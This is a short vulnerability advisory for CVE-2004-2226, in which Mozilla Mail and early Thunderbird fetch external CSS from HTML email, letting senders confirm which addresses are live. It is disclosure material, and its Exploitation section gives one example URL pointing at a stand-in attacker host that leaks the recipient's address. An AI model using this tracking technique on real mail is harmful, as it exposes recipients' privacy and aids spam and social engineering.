CVE-2004-2226

Vulnerability

A design weakness in the CSS fetching behavior of Mozilla Mail versions 1.7.1 and 1.7.3, as well as Mozilla Thunderbird before version 0.9, allows an attacker to confirm the validity of email addresses. By including an external Cascading Style Sheets (CSS) document in an HTML email, the mail client will make a network request to the attacker-controlled server when the email is rendered. This request reveals the recipient's email address if it is used within the CSS URL path [1].

Exploitation

An attacker sends an HTML-formatted email that references a CSS file hosted on their own server (e.g., http://attacker.com/css?target@example.com). The email must be displayed in a client that has HTML mail rendering enabled (the default in the affected versions). No user interaction beyond opening or previewing the message is required; the client automatically fetches the CSS. The attacker observes incoming HTTP requests to identify which specific email addresses were used in the CSS URLs [1].

Impact

Successful exploitation allows an attacker to determine whether a particular email address corresponds to an active user opening the message. This is a privacy and information disclosure issue; the attacker gains no further access to the system or to mailbox content, but the confirmation of valid addresses can be leveraged for spam targeting or social engineering campaigns [1].

Mitigation

Mozilla addressed this issue in Thunderbird version 0.9 and later [1]. Users of Mozilla Mail should upgrade to a fixed version (e.g., Mozilla Suite 1.8 or later) or disable HTML mail rendering in preferences. No workaround is provided for versions prior to the fix that does not involve disabling automatic external content loading. The vulnerability is not known to be listed on CISA’s Known Exploited Vulnerabilities catalog.